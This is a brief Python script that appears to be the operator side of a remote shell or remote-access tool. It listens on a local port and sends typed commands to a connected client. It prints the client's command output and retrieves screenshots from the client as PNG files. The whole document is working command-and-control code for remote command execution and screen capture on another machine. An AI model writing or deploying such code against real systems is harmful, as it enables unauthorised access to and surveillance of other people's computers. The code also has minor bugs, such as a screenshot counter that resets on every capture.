#!/usr/bin/python3 

# import socket
import socket

# define host and port
host = '127.0.0.1'
port = 8080

# create socket object (server)
# bind server to host and port
# listen for connections 

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen(1)
print('listening on ', port)

# accept connection from client
client, addr = server.accept()
print('connection established with ', addr)

# shell session
while True:

    # command input
    try:
        comm = input('shell# ').strip().lower()
    except KeyboardInterrupt:
        print('try the command "close" to end the connection.')
    if comm == 'close':
        break
    elif comm == '':
        pass
    elif comm == 'screenshot':

        # send command to client
        client.send(comm.encode())
        
        # start a conuter
        count = 0
        
        # create a empty png file
        f = open(f'screenshot{count}.png', 'wb')
        
        # count
        count += 1
        
        # set a timeout
        client.settimeout(5)
        
        # chunk receive data (image) from client
        chunk = client.recv(1024)
        while chunk:

            # data from chunk is written on the empty png file
            f.write(chunk)
            
            try:
                chunk = client.recv(1024)
            except socket.timeout as e:
                break
        client.settimeout(None)
        f.close()    
    else:
        # encode and send command
        # receive and decode output
        client.send(comm.encode())
        output = client.recv(1024).decode()
        print(output)

# close the connetion.
server.close()
